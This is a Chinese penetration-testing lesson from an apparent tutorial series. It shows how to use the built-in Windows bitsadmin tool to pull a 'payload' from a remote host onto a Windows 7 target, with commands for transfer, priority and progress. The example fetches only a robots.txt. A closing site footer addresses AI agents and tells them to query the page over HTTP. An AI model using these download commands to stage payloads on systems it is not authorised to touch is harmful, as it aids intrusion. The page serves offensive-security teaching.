# 第四十一课：bitsadmin一句话下载payload

**微软官方做出如下解释：**

> BITSAdmin是一个命令行工具，可用于创建下载或上传并监视其进度。

**具体相关参数参见官方文档：**\
<https://docs.microsoft.com/zh-cn/windows/desktop/Bits/bitsadmin-tool>

自 windows7 以上版本内置 bitsadmin，它可以在网络不稳定的状态下下载文件，出错会自动重试，在比较复杂的网络环境下，有着不错的性能。

**靶机：windows 7**

```bash
E:\>bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" E:\PDF\robots.txt
```

![](/files/-LZJx4dl8VlHe8tP0q6c)

需要注意的是，bitsadmin要求服务器支持Range标头。

如果需要下载过大的文件，需要提高优先级。配合上面的下载命令。再次执行

```bash
bitsadmin /setpriority down foreground
```

如果下载文件在1-5M之间，需要时时查看进度。同样它也支持进度条。

```bash
bitsadmin /transfer down /download /priority normal "http://192.168.1.115/robots.txt" E:\PDF\robots.txt
```

![](/files/-LZJx4dsGeqFpqYg_If3)

> 后者的话：不支持https协议。
>
> Micropoor


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://micro8.gitbook.io/micro8/contents-1/41-50/41bitsadmin-yi-ju-hua-xia-zai-payload.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.